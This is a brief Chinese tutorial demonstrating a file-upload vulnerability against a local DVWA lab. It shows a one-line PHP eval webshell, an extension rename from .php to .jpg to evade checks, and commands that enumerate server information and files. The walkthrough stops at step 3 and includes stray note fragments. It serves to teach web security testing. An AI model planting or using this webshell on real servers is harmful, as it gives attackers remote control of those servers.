⽂件上传漏洞演⽰(⼀句话⽊马⽂件+蚁剑)
▌漏洞描述
⽂件上传未做校验,可以上传⽊马⽂件到服务器上,从⽽获取服务器控制权限
▌演⽰环境
本地搭建的测试环境 dvwa
burpsuite等抓包⼯具
蚁剑等shell管理⼯具
▌演⽰过程详解
➊准备⽊马⽂件
新建⽊马⽂件shell.php,⽂件内容为<?php @eval($_REQUEST["shell"]); ?>
<?php
eval是做什么的
@eval($_REQUEST["shell"]);
>
➋保存后,将⽂件后缀名php改为jpg
➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,⽆法完成第⑤步的操作),然后打开⽂件上传模块
部分php函数
shell=phpinfo()显⽰服务器的详细信息
shell=echo(__dir__)显⽰当前路径
shell=print_r(scandir(__dir__))显⽰当前⽬录下的⽂件

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。